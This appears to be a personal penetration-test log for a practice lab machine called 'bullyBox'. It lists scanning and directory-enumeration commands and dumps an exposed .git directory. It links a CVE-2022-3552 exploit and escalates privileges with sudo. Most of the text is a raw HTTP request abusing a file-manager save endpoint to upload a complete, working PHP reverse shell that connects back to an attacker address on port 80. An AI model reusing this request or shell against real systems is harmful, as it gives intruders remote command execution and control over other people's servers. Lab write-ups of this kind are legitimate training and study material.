bullyBox

๐Ÿงช Pentest Log: {{date:2025-08-15}}

๐Ÿ” Target Information

ip=192.168.223.27

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Found .git directory use git-dumper

python3 ./git_dumper.py http://$ip ~/Documents/oscp/play_ground/bullyBox

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/0xk4b1r/CVE-2022-3552/blob/main/CVE-2022-3552.py

POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: bullybox.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://bullybox.local/bb-admin/order
Content-Type: application/x-www-form-urlencoded
Content-Length: 9959
Origin: http://bullybox.local
Connection: keep-alive
Cookie: PHPSESSID=g2gk367ldso50tpchf6ltmi28r
Upgrade-Insecure-Requests: 1
Priority: u=0, i

order_id=1&path=ax.php&data=<%3fphp
//+Copyright+(c)+2020+Ivan+Sincek
//+v2.3
//+Requires+PHP+v5.0.0+or+greater.
//+Works+on+Linux+OS,+macOS,+and+Windows+OS.
//+See+the+original+script+at+https%3a//github.com/pentestmonkey/php-reverse-shell.
class+Shell+{
++++private+$addr++%3d+null%3b
++++private+$port++%3d+null%3b
++++private+$os++++%3d+null%3b
++++private+$shell+%3d+null%3b
++++private+$descriptorspec+%3d+array(
++++++++0+%3d>+array('pipe',+'r'),+//+shell+can+read+from+STDIN
++++++++1+%3d>+array('pipe',+'w'),+//+shell+can+write+to+STDOUT
++++++++2+%3d>+array('pipe',+'w')++//+shell+can+write+to+STDERR
++++)%3b
++++private+$buffer++%3d+1024%3b++++//+read/write+buffer+size
++++private+$clen++++%3d+0%3b+++++++//+command+length
++++private+$error+++%3d+false%3b+++//+stream+read/write+error
++++public+function+__construct($addr,+$port)+{
++++++++$this->addr+%3d+$addr%3b
++++++++$this->port+%3d+$port%3b
++++}
++++private+function+detect()+{
++++++++$detected+%3d+true%3b
++++++++if+(stripos(PHP_OS,+'LINUX')+!%3d%3d+false)+{+//+same+for+macOS
++++++++++++$this->os++++%3d+'LINUX'%3b
++++++++++++$this->shell+%3d+'/bin/bash'%3b
++++++++}+else+if+(stripos(PHP_OS,+'WIN32')+!%3d%3d+false+||+stripos(PHP_OS,+'WINNT')+!%3d%3d+false+||+stripos(PHP_OS,+'WINDOWS')+!%3d%3d+false)+{
++++++++++++$this->os++++%3d+'WINDOWS'%3b
++++++++++++$this->shell+%3d+'cmd.exe'%3b
++++++++}+else+{
++++++++++++$detected+%3d+false%3b
++++++++++++echo+"SYS_ERROR%3a+Underlying+operating+system+is+not+supported,+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$detected%3b
++++}
++++private+function+daemonize()+{
++++++++$exit+%3d+false%3b
++++++++if+(!function_exists('pcntl_fork'))+{
++++++++++++echo+"DAEMONIZE%3a+pcntl_fork()+does+not+exists,+moving+on...\n"%3b
++++++++}+else+if+(($pid+%3d+%40pcntl_fork())+<+0)+{
++++++++++++echo+"DAEMONIZE%3a+Cannot+fork+off+the+parent+process,+moving+on...\n"%3b
++++++++}+else+if+($pid+>+0)+{
++++++++++++$exit+%3d+true%3b
++++++++++++echo+"DAEMONIZE%3a+Child+process+forked+off+successfully,+parent+process+will+now+exit...\n"%3b
++++++++}+else+if+(posix_setsid()+<+0)+{
++++++++++++//+once+daemonized+you+will+actually+no+longer+see+the+script's+dump
++++++++++++echo+"DAEMONIZE%3a+Forked+off+the+parent+process+but+cannot+set+a+new+SID,+moving+on+as+an+orphan...\n"%3b
++++++++}+else+{
++++++++++++echo+"DAEMONIZE%3a+Completed+successfully!\n"%3b
++++++++}
++++++++return+$exit%3b
++++}
++++private+function+settings()+{
++++++++%40error_reporting(0)%3b
++++++++%40set_time_limit(0)%3b+//+do+not+impose+the+script+execution+time+limit
++++++++%40umask(0)%3b+//+set+the+file/directory+permissions+-+666+for+files+and+777+for+directories
++++}
++++private+function+dump($data)+{
++++++++$data+%3d+str_replace('<',+'%26lt%3b',+$data)%3b
++++++++$data+%3d+str_replace('>',+'%26gt%3b',+$data)%3b
++++++++echo+$data%3b
++++}
++++private+function+read($stream,+$name,+$buffer)+{
++++++++if+(($data+%3d+%40fread($stream,+$buffer))+%3d%3d%3d+false)+{+//+suppress+an+error+when+reading+from+a+closed+blocking+stream
++++++++++++$this->error+%3d+true%3b++++++++++++++++++++++++++++//+set+global+error+flag
++++++++++++echo+"STRM_ERROR%3a+Cannot+read+from+${name},+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$data%3b
++++}
++++private+function+write($stream,+$name,+$data)+{
++++++++if+(($bytes+%3d+%40fwrite($stream,+$data))+%3d%3d%3d+false)+{+//+suppress+an+error+when+writing+to+a+closed+blocking+stream
++++++++++++$this->error+%3d+true%3b++++++++++++++++++++++++++++//+set+global+error+flag
++++++++++++echo+"STRM_ERROR%3a+Cannot+write+to+${name},+script+will+now+exit...\n"%3b
++++++++}
++++++++return+$bytes%3b
++++}
++++//+read/write+method+for+non-blocking+streams
++++private+function+rw($input,+$output,+$iname,+$oname)+{
++++++++while+(($data+%3d+$this->read($input,+$iname,+$this->buffer))+%26%26+$this->write($output,+$oname,+$data))+{
++++++++++++if+($this->os+%3d%3d%3d+'WINDOWS'+%26%26+$oname+%3d%3d%3d+'STDIN')+{+$this->clen+%2b%3d+strlen($data)%3b+}+//+calculate+the+command+length
++++++++++++$this->dump($data)%3b+//+script's+dump
++++++++}
++++}
++++//+read/write+method+for+blocking+streams+(e.g.+for+STDOUT+and+STDERR+on+Windows+OS)
++++//+we+must+read+the+exact+byte+length+from+a+stream+and+not+a+single+byte+more
++++private+function+brw($input,+$output,+$iname,+$oname)+{
++++++++$fstat+%3d+fstat($input)%3b
++++++++$size+%3d+$fstat['size']%3b
++++++++if+($this->os+%3d%3d%3d+'WINDOWS'+%26%26+$iname+%3d%3d%3d+'STDOUT'+%26%26+$this->clen)+{
++++++++++++//+for+some+reason+Windows+OS+pipes+STDIN+into+STDOUT
++++++++++++//+we+do+not+like+that
++++++++++++//+we+need+to+discard+the+data+from+the+stream
++++++++++++while+($this->clen+>+0+%26%26+($bytes+%3d+$this->clen+>%3d+$this->buffer+%3f+$this->buffer+%3a+$this->clen)+%26%26+$this->read($input,+$iname,+$bytes))+{
++++++++++++++++$this->clen+-%3d+$bytes%3b
++++++++++++++++$size+-%3d+$bytes%3b
++++++++++++}
++++++++}
++++++++while+($size+>+0+%26%26+($bytes+%3d+$size+>%3d+$this->buffer+%3f+$this->buffer+%3a+$size)+%26%26+($data+%3d+$this->read($input,+$iname,+$bytes))+%26%26+$this->write($output,+$oname,+$data))+{
++++++++++++$size+-%3d+$bytes%3b
++++++++++++$this->dump($data)%3b+//+script's+dump
++++++++}
++++}
++++public+function+run()+{
++++++++if+($this->detect()+%26%26+!$this->daemonize())+{
++++++++++++$this->settings()%3b

++++++++++++//+-----+SOCKET+BEGIN+-----
++++++++++++$socket+%3d+%40fsockopen($this->addr,+$this->port,+$errno,+$errstr,+30)%3b
++++++++++++if+(!$socket)+{
++++++++++++++++echo+"SOC_ERROR%3a+{$errno}%3a+{$errstr}\n"%3b
++++++++++++}+else+{
++++++++++++++++stream_set_blocking($socket,+false)%3b+//+set+the+socket+stream+to+non-blocking+mode+|+returns+'true'+on+Windows+OS

++++++++++++++++//+-----+SHELL+BEGIN+-----
++++++++++++++++$process+%3d+%40proc_open($this->shell,+$this->descriptorspec,+$pipes,+null,+null)%3b
++++++++++++++++if+(!$process)+{
++++++++++++++++++++echo+"PROC_ERROR%3a+Cannot+start+the+shell\n"%3b
++++++++++++++++}+else+{
++++++++++++++++++++foreach+($pipes+as+$pipe)+{
++++++++++++++++++++++++stream_set_blocking($pipe,+false)%3b+//+set+the+shell+streams+to+non-blocking+mode+|+returns+'false'+on+Windows+OS
++++++++++++++++++++}

++++++++++++++++++++//+-----+WORK+BEGIN+-----
++++++++++++++++++++$status+%3d+proc_get_status($process)%3b
++++++++++++++++++++%40fwrite($socket,+"SOCKET%3a+Shell+has+connected!+PID%3a+"+.+$status['pid']+.+"\n")%3b
++++++++++++++++++++do+{
						$status+%3d+proc_get_status($process)%3b
++++++++++++++++++++++++if+(feof($socket))+{+//+check+for+end-of-file+on+SOCKET
++++++++++++++++++++++++++++echo+"SOC_ERROR%3a+Shell+connection+has+been+terminated\n"%3b+break%3b
++++++++++++++++++++++++}+else+if+(feof($pipes[1])+||+!$status['running'])+{+++++++++++++++++//+check+for+end-of-file+on+STDOUT+or+if+process+is+still+running
++++++++++++++++++++++++++++echo+"PROC_ERROR%3a+Shell+process+has+been+terminated\n"%3b+++break%3b+//+feof()+does+not+work+with+blocking+streams
++++++++++++++++++++++++}++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++//+use+proc_get_status()+instead
++++++++++++++++++++++++$streams+%3d+array(
++++++++++++++++++++++++++++'read'+++%3d>+array($socket,+$pipes[1],+$pipes[2]),+//+SOCKET+|+STDOUT+|+STDERR
++++++++++++++++++++++++++++'write'++%3d>+null,
++++++++++++++++++++++++++++'except'+%3d>+null
++++++++++++++++++++++++)%3b
++++++++++++++++++++++++$num_changed_streams+%3d+%40stream_select($streams['read'],+$streams['write'],+$streams['except'],+0)%3b+//+wait+for+stream+changes+|+will+not+wait+on+Windows+OS
++++++++++++++++++++++++if+($num_changed_streams+%3d%3d%3d+false)+{
++++++++++++++++++++++++++++echo+"STRM_ERROR%3a+stream_select()+failed\n"%3b+break%3b
++++++++++++++++++++++++}+else+if+($num_changed_streams+>+0)+{
++++++++++++++++++++++++++++if+($this->os+%3d%3d%3d+'LINUX')+{
++++++++++++++++++++++++++++++++if+(in_array($socket++,+$streams['read']))+{+$this->rw($socket++,+$pipes[0],+'SOCKET',+'STDIN'+)%3b+}+//+read+from+SOCKET+and+write+to+STDIN
++++++++++++++++++++++++++++++++if+(in_array($pipes[2],+$streams['read']))+{+$this->rw($pipes[2],+$socket++,+'STDERR',+'SOCKET')%3b+}+//+read+from+STDERR+and+write+to+SOCKET
++++++++++++++++++++++++++++++++if+(in_array($pipes[1],+$streams['read']))+{+$this->rw($pipes[1],+$socket++,+'STDOUT',+'SOCKET')%3b+}+//+read+from+STDOUT+and+write+to+SOCKET
++++++++++++++++++++++++++++}+else+if+($this->os+%3d%3d%3d+'WINDOWS')+{
++++++++++++++++++++++++++++++++//+order+is+important
++++++++++++++++++++++++++++++++if+(in_array($socket,+$streams['read'])/*------*/)+{+$this->rw+($socket++,+$pipes[0],+'SOCKET',+'STDIN'+)%3b+}+//+read+from+SOCKET+and+write+to+STDIN
++++++++++++++++++++++++++++++++if+(($fstat+%3d+fstat($pipes[2]))+%26%26+$fstat['size'])+{+$this->brw($pipes[2],+$socket++,+'STDERR',+'SOCKET')%3b+}+//+read+from+STDERR+and+write+to+SOCKET
++++++++++++++++++++++++++++++++if+(($fstat+%3d+fstat($pipes[1]))+%26%26+$fstat['size'])+{+$this->brw($pipes[1],+$socket++,+'STDOUT',+'SOCKET')%3b+}+//+read+from+STDOUT+and+write+to+SOCKET
++++++++++++++++++++++++++++}
++++++++++++++++++++++++}
++++++++++++++++++++}+while+(!$this->error)%3b
++++++++++++++++++++//+------+WORK+END+------

++++++++++++++++++++foreach+($pipes+as+$pipe)+{
++++++++++++++++++++++++fclose($pipe)%3b
++++++++++++++++++++}
++++++++++++++++++++proc_close($process)%3b
++++++++++++++++}
++++++++++++++++//+------+SHELL+END+------

++++++++++++++++fclose($socket)%3b
++++++++++++}
++++++++++++//+------+SOCKET+END+------

++++++++}
++++}
}
echo+'<pre>'%3b
//+change+the+host+address+and/or+port+number+as+necessary
$sh+%3d+new+Shell('192.168.45.163',+80)%3b
$sh->run()%3b
unset($sh)%3b
//+garbage+collector+requires+PHP+v5.3.0+or+greater
//+%40gc_collect_cycles()%3b
echo+'</pre>'%3b
%3f>

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo:

sudo -l

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

sudo su -